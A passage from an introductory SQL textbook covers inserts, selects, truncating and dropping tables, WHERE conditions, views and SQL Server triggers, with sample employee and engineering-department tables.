(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(3,'Sara','43','America', '6000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(4,'Aaron','56','America', '15000');
Insert into Employee
(StafID,StafName,StafAGE,StafADDRESS,StafSALARY)
Values(5,'Talha','24','Pakistan', '10000');
Output:
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
(1 row(s) affected)
So far, we have created a database, and further, we have added a table into
that database. In the example above, I inserted data into the Employee table.
The output of the above-mentioned query only showed whether my query
was successful or not or how many rows it affected in case of a successful
query, as you can see in the output shown above. Now, let’s see how you can
see the data present in a table. To see the contents of an SQL table, we can
use the SQL Select statement.
Example:
/****** Script for SelectTopNRows command from SSMS ******/
SELECT TOP 1000 [StafID]
,[StafName]
,[StafAGE]
,[StafADDRESS]
,[StafSALARY]
FROM [Employee].[dbo].[Employee];
The query above is selecting the top 1000 rows of the table: Employee. You
can select all records by removing TOP 1000. If you don’t want to mention
the column names in a query, you can simply put an asterisk after the select
keyword and create a select query:
/****** Script for SelectTopNRows command from SSMS ******/
SELECT * FROM [Employee].[dbo].[Employee];
The output of both queries mentioned above will be following:
Output:
StafID StafName StafAGE StafADDRESS StafSALARY
1 John 23 America 5000.00
2 Mike 32 Africa 4000.00
3 Sara 43 America 6000.00
4 Aaron 56 America 15000.00
5 Talha 24 Pakistan 10000.00
You can truncate an SQL table using SQL command: Truncate. Truncate
deletes all the data inside a table, but it doesn’t delete or modify the structure
of the table. After a successful truncate operation, you will be left with an
empty table. To truncate Employee’s table, use the following query:

Example:
Truncate Table Employee;
Output:
Command(s) completed successfully.
Now, if you select the records of Employee table, you will find out that it’s
empty and the records that you inserted earlier are not there anymore. If you
want to drop the table and its data, use the Drop command.
Example:
Drop Table Employee;
Output:
Command(s) completed successfully.
After the successful execution of drop command, the Employee table will be
deleted.
There exists three relationship types between tables. A one-to-one
relationship between two tables means that a single record from table A will
only be associated to a single row in table B. A one-to-many relationship
suggests that a single record from table A will be related to more than one
record present in table B. For example, a single employee, Aaron, could serve
more than one customer, hence a one-to-many relationship exists between
employees and customers. In a many-to-many relationship, multiple rows
from table A can be associated with multiple rows of table B. For example, a
course can have many registered students and many students could have
registered more than one course. The list of examples goes on and on. It will
be a good exercise for you to come up with at least five examples for each
relationship type.
Chapter 9 Defining Your Condition
There is no doubt that a data server can handle many complications, provided
everything is defined clearly. Conditions are defined with the help of
expressions, which may consist of numbers, strings, in built functions, sub
queries, etc. Furthermore, conditions are always defined with the help of
operators which may be comparison operators(=, !=, <,>,<>, Like,IN,
BETWEEN, etc) or arithmetic operators(+, -,*,/); All these things are used
together to form a condition. Now let’s move onto Condition Types.
Types of Conditions
In order to remove unwanted data from our search, we can use these
conditions. Let’s have a look at some of these condition types.
Equality Condition
Conditions that use the equal sign ‘=’ to equate one condition to another are
referred to as equality conditions. You have used this condition many times at
this point.
If we want to know the name of the HOD for Genetic Engineering
department, we would do the following:
(1) First go to ENGINEERING_STUDENTS table and find the ENGG_ID
for ENGG_NAME ‘Genetic’,
SELECT ENGG_ID FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME ='Genetic';
+ - - - - - - - -+
| ENGG_ID |
+ - - - - - - - -+
| 3 |
+ - - - - - - - -+
(2) Then go to Dept_Data table and find the value in HOD column for
ENGG_ID = 3.
SELECT HOD FROM DEPT_DATA where ENGG_ID='3';
+---------+
| HOD |
+---------+
| Victoria Fox |
+---------+
In the first step, we equated the value of column ENGG_NAME to the string
value of ‘Genetic’.
SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH,
d.HOD,d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME = 'Genetic';
+-----------+------------------+--------+-----------
-+
| ENGG_NAME | STUDENT_STRENGTH | HOD |
NO_OF_Prof |
+-----------+------------------+--------+-----------
-+
| Genetic | 75 | Victoria Fox |
7 |
+-----------+------------------+--------+-----------
-+
In the above query, we have all the information in one result set by using an
INNER JOIN and using equality condition twice.
Inequality Condition
The inequality condition is the opposite of equality condition and is
expressed by ‘!=’ and the ‘<>’ symbol.
SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH,
d.HOD,d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME <> 'Genetic';
+--------------+--------------------+-----------+---
------+
ENGG_NAME | STUDENT_STRENGTH | HOD |
NO_OF_Prof |
+--------------+--------------------+-----------+---
------+
| Electronics | 150 | Miley Andrews |
7 |
| Software | 250 | Alex Dawson |
6 |
| Mechanical | 150 | Anne
Joseph |5 |
| Biomedical | 72 | Sophia Williams |
8 |
| Instrumentation | 80 | Olive Brown |
4 |
| Chemical | 75 | Joshua Taylor |
6 |
| Civil | 60 | Ethan Thomas |
5 |
| Electronics & Com | 250 | Michael Anderson |
8 |
| Electrical | 60 | Martin Jones |
5 |
+--------------+--------------------+-----------+---
------+
The statement is the same as saying:
SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH,
d.HOD,d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME != 'Genetic';
If you execute the above statement on the command window, you will
receive the same result set.
Using the equality condition to modify data
Suppose the institute decides to close the Genetic Department; in that case, it
is important to delete the records from the database as well.
First, find out what is the ENGG_ID for ‘Genetic’ so that
SELECT * FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME='Genetic';
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| 3 | Genetic | 75 |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Now from DEPT_DATA we will DELETE the row having ENGG_ID =’3’
DELETE FROM DEPT_DATA WHERE ENGG_ID ='3';
Next, we need to check if the data has been actually deleted or not:
SELECT * FROM DEPT_DATA;
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
| 101 | Alex Dawson |6 | 2|
| 103 | Anne Joseph |5 | 4|
| 104 | Sophia Williams |8 | 5|
| 105 | Olive Brown |4 | 6|
| 106 | Joshua Taylor |6 | 7|
| 107 | Ethan Thomas |5 | 8|
| 108 | Michael Anderson | 8 | 9|
| 109 | Martin Jones |5 | 10 |
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
Then delete the row from ENGINEERING_STUDENTS where the
ENGG_ID is 3.
DELETE FROM ENGINEERING_STUDENTS WHERE ENGG_ID='3';
Lastly, check if the row has been deleted from
ENGINEERING_STUDENTS:
SELECT * FROM ENGINEERING_STUDENTS;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 5 | Biomedical | 72 |
| 6 | Instrumentation | 80 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Note the records have been successfully deleted from both areas.
Same way the equality condition can be used to update data as well.
Conditions used to define range
We have seen examples of range previously, but we will delve a little deeper
to solidify that knowledge . We want to write queries to define a range to
ensure our expression is within the desired range.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH>175
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 2 | Software | 250 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Have a look at another simple example:
SELECT * FROM ENGINEERING_STUDENTS WHERE
300>STUDENT_STRENGTH AND STUDENT_STRENGTH>78;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Next, we will define the same query using the BETWEEN operator. While
defining a range using the BETWEEN operator, specify the lesser value first
and the higher value later.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH BETWEEN 78 AND 300;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Membership Conditions
Sometimes the requirement is not looking for values in a range, but in a set of
certain values. To give you a better idea, suppose that you need to find the
details for ‘Electronics’, ‘Instrumentation’ and ‘Mechanical’:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
= 'Electronics' OR ENGG_NAME = 'Mechanical' OR ENGG_NAME =
'Instrumentation';
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 1 | Electronics | 150 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
+---------+-------------+------------------+
We can simplify the above query and get the right result sets using the IN
operator:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 1 | Electronics | 150 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
+---------+-------------+------------------+
it is the same way if you want to find the data for Engineering fields other
than ‘Electronics’, ‘Mechanical’ and ‘Instrumentation’ use the NOT IN
operator as shown below:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
NOT IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 2 | Software | 250 |
| 5 | Biomedical | 72 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+---------+-------------+------------------+
Matching Conditions
Suppose you meet all the HOD of the college in a meeting and you are very
impressed by one HOD, but you only remember the name starts with ‘S’.
You can use the following query to find the right person:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,1)='S';
Here we are using a function left(). It has two parameters: The first value is a
String, which is from the extracted resulted. Here, we will look in the
column_name HOD. The second value determines how many characters
should be extracted from the left.
In this case, we remember the name starts with ‘S’ so we are just going to
extract the first letter of each name in the HOD column to check if it matches
‘S’. The result is as shown below:
+------+-----------+---------+---------+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+------+-----------+---------+---------+
| 104 | Sophia Williams | 8 | 5|
+------+-----------+---------+---------+
One more demonstration to help reinforce the concept:
Suppose you want to look for people having the names starting with ‘Mi’:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,2)='Mi';
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews |7 | 1|
| 108 | Michael Anderson | 8 | 9|
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
Pattern Matching
Pattern matching in another interesting feature you will enjoy, and will use
often as a developer. The concept is simple; It allows you to use an
underscore ( _ ) to match any single character and percentage sign(%) to
match 0, 1, or more characters. Before moving ahead, know that two
comparison operators: LIKE and NOT LIKE, are used in pattern matching.
Now onto the exercises:
Here is the same example where we want to find out the HOD with a name
starting with ‘S’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE 'S%';
+------+-----------+---------+---------+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+------+-----------+---------+---------+
| 104 | Sophia Williams | 8 | 5|
+------+-----------+---------+---------+
Now, let’s look for HOD having name ending with ‘ws’:
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%ws';
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
Let’s see if we can find a name containing the string ‘cha’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%cha%';
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| 108 | Michael Anderson | 8 | 9|
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
The next example shows how to look for a five letter word with ‘i’ being the
second letter of the word:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
LIKE '_i___';
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| 8 | Civil | 60 |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
Regular Expressions
To add more flexibility to your search operations, you can make use of
Regular expressions. It is a vast topic, so here are a few tips to make you
comfortable when utilizing regular expressions:

'^' indicates beginning of a string.


'$' indicates the end of a string.
Single characters are denoted by a '.'.
[...] indicates any character that is listed between the square
brackets
[^...]indicates all characters that are not contained in the square
brackets’ list
p1|p2|p3 is for matching any of the given patterns p1, p2, or p3
* denotes zero or more occurrences of elements that are
preceding
+ indicates a single or multiple instances of elements that are
preceding
n instances is indicated by {n}.
m through n is indicated by {m,n}
Here are a few examples of regular expressions;
Find all HOD having names that start with ‘M’:
SELECT * FROM DEPT_DATA WHERE HOD REGEXP '^M';
+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - +
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - +
| 100 | Miley Andrews |7 | 1|
| 108 | Michael Anderson | 8 | 9|
| 109 | Martin Jones |5 | 10 |
+ - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - +
Look for HOD names that end with ‘ws’;
SELECT * FROM DEPT_DATA WHERE HOD REGEXP 'ws$';
+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - - +
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
+ - - - - - + - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - +
NULL
Before we end this chapter, here is something you must know about the
NULL operator. NULL is defined as absence of value. An expression can be
NULL but it cannot be equal to NULL. Also, two NULL operators are never
equal to each other. Whenever you have to check an expression, don’t write
WHERE COLUMN_NAME = NULL. The proper method is writing
COLUMN_NAME IS NULL.
Chapter 10 Views
VIEWS are virtual tables or stored SQL queries in the databases that have
predefined queries and unique names. They are actually the resulting tables
from your SQL queries.
As a beginner, you may want to learn about how you can use VIEWS.
Among their numerous uses is their flexibility can combine rows and
columns from VIEWS.
Here are important pointers and advantages in using VIEWS:

1. You can summarize data from different tables, or a subset of


columns from various tables.
2. You can control what users of your databases can see, and
restrict what you don’t want them to view.
3. You can organize your database for your users’ easy
manipulation, while simultaneously protecting your non-public
files.
4. You can modify, or edit, or UPDATE your data. Sometimes
there are limitations, though, such as, being able to access only
one column when using VIEW.
5. You can create columns from various tables for your reports.
6. You should increase the security of your databases because
VIEWS can display only the information that you want
displayed. You can protect specific information from other
users.
7. You can provide easy and efficient accessibility or access paths
to your data to users.
8. You can allow users of your databases to derive various tables
from your data without dealing with the complexity of your
databases.
9. You can rename columns through views. If you are a website
owner, VIEWS can also provide domain support.
10. The WHERE clause in the SQL VIEWS query may not contain
subqueries.
11. For the INSERT keyword to function, you must include all
NOT NULL columns from the original table.
12. Do not use the WITH ENCRIPTION (unless utterly necessary)
clause for your VIEWS because you may not be able to retrieve
the SQL.
13. Avoid creating VIEWS for each base table (original table). This
can add more workload in managing your databases. As long as
you create your base SQL query properly, there is no need to
create VIEWS for each base table.
14. VIEWS that use the DISTINCT and ORDER BY clauses or
keywords may not produce the expected results.
15. VIEWS can be updated under the condition that the SELECT
clause may not contain the summary functions; and/or the set
operators, and the set functions.
16. When UPDATING, there should be a synchronization of your
base table with your VIEWS table. Therefore, you must
analyze the VIEW table, so that the data presented are still
correct, each time you UPDATE the base table.
17. Avoid creating VIEWS that are unnecessary because this will
clutter your catalogue.
18. Specify “column_names” clearly.
19. The FROM clause of the SQL VIEWS query may not contain
many tables, unless specified.
20. The SQL VIEWS query may not contain HAVING or GROUP
BY.
21. The SELECT keyword can join your VIEW table with your
base table.
How to create VIEWS
You can create VIEWS through the following easy steps:
Step #1 - Check if your system is appropriate to implement VIEW queries.
Step #2 - Make use of the CREATE VIEW SQL statement.
Step #3 – Use key words for your SQL syntax just like with any other SQL
main queries.
Step #4 – Your basic CREATE VIEW statement or syntax will appear like
this:
Example: Create view view_”table_name AS
SELECT “column_name1”
FROM “table_name”
WHERE [condition];
Let’s have a specific example based on our original table.
EmployeesSalary
Names Age Salary City
Williams, Michael 22 30000.00 Casper
Colton, Jean 24 37000.00 San Diego
Anderson, Ted 30 45000.00 Laramie
Dixon, Allan 27 43000.00 Chicago
Clarkson, Tim 25 35000.00 New York
Alaina, Ann 32 41000.00 Ottawa
Rogers, David 29 50000.00 San Francisco
Lambert, Jancy 38 47000.00 Los Angeles
Kennedy, Tom 27 34000.00 Denver
Schultz, Diana 40 46000.00 New York

Based on the table above, you may want to create a view of the customers’
name and the City only. This is how you should write your statement.
Example: CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary;
From the resulting VIEW table, you can now create a query such as the
statement below.
SELECT * FROM EmployeesSalary_VIEW;
This SQL query will display a table that will appear this way:
EmployeesSalary
Names City
Williams, Michael Casper
Colton, Jean San Diego
Anderson, Ted Laramie
Dixon, Allan Chicago
Clarkson, Tim New York
Alaina, Ann Ottawa
Rogers, David San Francisco
Lambert, Jancy Los Angeles
Kennedy, Tom Denver
Schultz, Diana New York

Using the keyword WITH CHECK OPTION


These keywords ascertain that there will be no return errors with the INSERT
and UPDATE returns, and that all conditions are fulfilled properly.
Example: CREATE VIEW “table_Name”_VIEW AS
SELECT “column_name1”, “column_name2”
FROM “table_name”
WHERE [condition]
WITH CHECK OPTION;
Applying this SQL statement to the same conditions (display name and city),
we can come up now with our WITH CHECK OPTION statement.
Example: CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary
WHERE City IS NOT NULL
WITH CHECK OPTION;
The SQL query above will ensure that there will be no NULL returns in your
resulting table.
DROPPING VIEWS
You can drop your VIEWS whenever you don’t need them anymore. The
SQL syntax is the same as the main SQL statements.
Example: DROP VIEW EmployeesSalary_VIEW;
UPDATING VIEWS
You can easily UPDATE VIEWS by following the SQL query for main
queries.
Example: CREATE OR REPLACE VIEW “tablename”_VIEWS (could also
be VIEWS_’tablename”) AS
SELECT “column_name”
FROM “table_name”
WHERE condition;
DELETING VIEWS
The SQL syntax for DELETING VIEWS is much the same way as
DELETING DATA using the main SQL query. The difference only is in the
name of the table.
If you use the VIEW table example above, and want to delete the City
column, you can come up with this SQL statement.
Example: DELETE FROM EmployeesSalary_VIEW
WHERE City = ‘New York’;
The SQL statement above would have this output:
EmployeesSalary
Names Age Salary City
Williams, Michael 22 30000.00 Casper
Colton, Jean 24 37000.00 San Diego
Anderson, Ted 30 45000.00 Laramie
Dixon, Allan 27 43000.00 Chicago
Alaina, Ann 32 41000.00 Ottawa
Rogers, David 29 50000.00 San Francisco
Lambert, Jancy 38 47000.00 Los Angeles
Kennedy, Tom 27 34000.00 Denver

INSERTING ROWS
Creating an SQL in INSERTING ROWS is similar to the UPDATING
VIEWS syntax. Make sure you have included the NOT NULL columns.
Example: INSERT INTO “table_name”_VIEWS “column_name1”
WHERE value1;
VIEWS can be utterly useful, if you utilize them appropriately.
To date in this EBook tables have been used to represent data and
information. Views are like virtual tables but they don’t hold any data and
their contents are defined by a query. One of the biggest advantages of a
View is that it can be used as a security measure by restricting access to
certain columns or rows. Also, you can use views to return a selective
amount of data instead of detailed data. A view protects the data layer while
allowing access to the necessary data. A view differs to that of a stored
procedure in that it doesn’t use parameters to carry out a function.
Encrypting the View
You can create a view without columns which contain sensitive data and thus
hide data you don’t want to share. You can also encrypt the view definition
which returns data of a privileged nature. Not only are you restricting certain
columns in a view you are also restricting who has access to the view.
However, once you encrypt a view it is difficult to get back to the original
view detail. Best approach is to make a backup of the original view.
Creating a view
To create a view in SSMS expand the database you are working on, right
click on Views and select New View. The View Designer will appear
showing all the tables that you can add. Add the tables you want in the
View. Now select which columns you want in the View. You can now
change the sort type for each column from ascending to descending and can
also give column names aliases. On the right side of sort type there is Filter.
Filter restricts what a user can and cannot see. Once you set a filter (e.g.
sales > 1000) a user cannot retrieve more information than this view allows.
In the T-SQL code there is a line stating TOP (100) PERCENT which is the
default. You can remove it (also remove the order by statement) or change
the value. Once you have made the changes save the view with the save
button and start the view with vw_ syntax. You can view the contents of the
view if you refresh the database, open views, right click on the view and
select top 1000 rows.
Indexing a view
You can index a view just like you can index a table. The rules are very
similar. When you build a view the first index needs to be a unique clustered
index. Subsequent non clustered indexes can then be created. You need to
have the following set to on, and one off:
SET ANSI_NULLS ON
SET ANSI_PADDING ON
SET ANSI_WARNINGS ON
SET CONCAT_NULL_YIELDS_NULL ON
SET ARITHABORT ON
SET QUOTED_IDENTIFIER ON
SET NUMERIC_ROUNDABORT OFF
Now type the following: CREATE UNIQUE CLUSTERED INDEX
_ixCustProduct
ON table.vw_CusProd(col1,col2)
Chapter 11 Triggers
Sometimes a modification to the data in your database will need an automatic
action on data somewhere else, be it in your database, another database or
within SQL Server. A trigger is an object that will do it. A trigger in SQL
Server is essentially a Stored Procedure which will run performing the action
you want to achieve. Triggers are mostly used to ensure the business logic is
being adhered to in the database, performing cascading data modifications
(i.e. change on one table will result in changes in other tables) and keeping
track of specific changes to a table. SQL Server supports three types of
triggers:

DDL (Data Definition Language) triggers which fire off in


response to a DDL statement being executed (e.g. CREATE,
ALTER or DROP). DDL triggers can be used for auditing or
limiting DBA activity.
Logon triggers are triggers that fire off when a session to the
instance is established. This trigger can be used to stop users
from establishing a connection to an instance.
DML triggers (Data Manipulation Language) are triggers
which fire off as a result of a DML statement (INSERT,
UPDATE, DELETE) being executed.
DDL Triggers
You can create DDL triggers at either the instance level (server scoped) or
the database level (e.g. tables being changed or dropped). You can create
DDL triggers that respond to all database level events at server level so that
they respond to events in all databases.
DDL triggers can provide a mechanism for auditing or limiting the DBA
which is useful when you have a team that needs certain (e.g. elevated)
permissions to databases. You can use these DDL triggers to carry out the
function a DBA would, very useful if you had a junior DBA on your team.
When a trigger is executing you have access to a function called
EVENTDATA(). This is well formed XML document, this includes data of
the user who executed the original statement. So, you can check this to
ensure everything is proper. DDL triggers can respond to CREATE,
ALTER, DROP, GRANT, DENY, REVOKE and UPDATE STATISTICS.
To create a DDL trigger you use the CREATE TRIGGER DDL statement.
The structure of a CREATE TRIGGER is the following:
CREATE TRIGGER <Name>
ON <Scope>
WITH <Options>
AFTER
AS
<code>
ON - specifies the scope of the DDL trigger, there is ALL SERVER (instance
level) and DATABASE(level)
WITH – either with ENCRYPTION (to hide the definition of the trigger) or
EXECUTE AS. EXECUE AS takes one of the following - LOGIN, USER,
SELF, OWNER, CALLER. It allows you to change the security context of
the trigger, i.e. it allows you to change permission level.
FOR or AFTER – either the FOR or AFTER keyword. Both are
interchangeable in this context. The trigger will execute after the original
statement completes.
AS – specifies that either the SQL statements that define the code body of the
trigger or the EXTERNAL NAME clause to point to a CLR trigger.
The following is an example of a DDL trigger which stops any user dropping
or altering any table on the server scope:
CREATE TRIGGER DDLTriggerExample
ON ALL SERVER
FOR DROP_TABLE, ALTER_TABLE
AS
PRINT 'If you want to alter/delete this table you will need to disable this
trigger'
ROLLBACK;
You can disable triggers using the DISABLE TRIGGER and enable triggers
with the ENABLE TRIGGER command. The following command disables
all triggers on the server scope:
DISABLE TRIGGER ALL ON ALL SERVER
Logon Triggers
Logon triggers are like DDL triggers except that instead of firing off in
response to a DDL event they fire off when a LOGON event occurs in the
instance. Logon triggers have an advantage over other logon event handling
in SQL Server in that they can stop the user from establishing a connection.
This is because it fires at the same time as the event as opposed to waiting for
it to complete.
This type of trigger is very useful when you want to limit the number of users
connecting to the instance. Say for example the server would be very busy in
the evening running jobs, the following example illustrates how you can limit
access to the instance from 6pm to midnight except for the sysacc account:
CREATE TRIGGER StopNightLogin
ON ALL SERVER
FOR LOGON
AS
BEGIN
IF (CAST(GETDATE() AS TIME) >= CAST('18:00:00' AS TIME)
AND CAST(GETDATE() AS TIME) <= CAST('24:00:00' AS TIME)
AND UPPER(ORIGINAL_LOGIN()) <> 'SYSACC')
ROLLBACK ;
END
DML Trigger
The most popular use for a DML trigger is to enforce a business rule. An
example of enforcing a business rule would be to ensure that there is enough
stock before a customer places an order or that the customer has enough
money in their account. You can use the DML trigger to enforce extra
validation like complex data checks that constraints can’t, or make changes in
another table based on what is about to happened in the original table. The
syntax for creating a DML trigger is the following:
CREATE TRIGGER triggerName
On Table
WITH ENCRYPTION
FOR INSERT, UPDATE, DELETE
AS
IF UPDATE column and UPDATE column
COLUMNS_UPDATE()
Sql statements()
The syntax largely follows the other trigger types except with the FOR
statement. This part of the syntax determines what action will execute. The
DML trigger can only specifically act on a data modification action which
can be only INSERT, DELETE or INSERT. The trigger can fire on one, two
or three of these commands, depending on what you want the trigger to do.
The IF UPDATE column AND OR UPDATE column is used to test whether
a specific column has been modified. You will get a logical TRUE or
FALSE statement returned depending on whether the column has been
updated. If you delete a record it will not set this UPDATE to TRUE as it is
being removed.
The COLUMNS_UPDATE() is similar to UPDATE() but instead tests
multiple columns.
The SQL statement() is the code which you want to execute, like any other
stored procedure.
The following is an example of a DML trigger which execute when there has
been an INSERT, UPDATE or DELETE on the PersonTable
CREATE TRIGGER DMLTriggerExample
ON PersonTable
FOR INSERT, UPDATE, DELETE
AS
BEGIN
PRINT 'AFTER Trigger DMLTriggerExample has been executed!'
END
Now if you execute the above trigger and try to insert some values into the
table PersonTable with the following:
INSERT INTO dbo.PersonTable ( FirstName, LastName )
VALUES('Dovid','Malthe')
The trigger will be executed and you will receive the following messages in
SSMS
AFTER Trigger DMLTriggerExample has been executed!
Trigger order
You can create multiple triggers which respond to the same event and can
control which order in which they execute. You do this by using the
sp_settriggerorder stored procedure. It takes the following parameters:
@triggername – the trigger name which you want to execute first or last.
@order – takes values FIRST, LAST, NONE.
@stmttype – this is the type of statement that causes the trigger to fire. For
logon triggers it is the logon event, for DDL triggers it is any DDL event (but
you are not allowed to specify an event class). For DML triggers, the value
can be INSERT, UPDATE or DELETE.
@namespace – specifies the scope of the trigger. This can be specified as
SERVER, DATABASE or NULL. If NULL is passed, then it indicates that
the trigger is a DML trigger.
The following example sets off the EnsureLicence logon trigger before the
StopNightLogin trigger which was created in the previous example.
USE Master
GO
EXEC sp_settriggerorder @triggername='EnsureLicense', @order='First',
stmttype='LOGON',
@namespace='SERVER'
EXEC sp_settriggerorder @triggername='StopNightLogin', @order='Last',
@stmttype='LOGON', @namespace='SERVER'
Chapter 12 Combining and Joining Tables
There will be times that you have to combine tables. This task can be more
complex than simply creating tables. But like everything that you do, the
difficulty is all in your mind. If you think you can, then you can. So, here it
goes.
The steps in combining tables are the following:
Step #1 – SELECT the columns you want to combine
You can indicate this with the SQL key word SELECT. This will display the
columns you want to combine.
Example: SELECT “column_name”, “colum_name” FROM “table_name”
Step #2 – Add the keyword UNION
Add the key word UNION to indicate your intent of combining the tables.
Example: SELECT “column_name”, “column_name” from “table_name”
UNION
Step #3 – SELECT the other columns
Now, SELECT the other columns you want to combine with your first
selected columns.
Example: SELECT “column_name”, “column_name” FROM “table_name”
UNION SELECT “column_name”, “column_name” FROM “table_name”;
Step #4 – Use UNION ALL, in some cases
You can proceed to this step, in cases, when you want to include duplicate
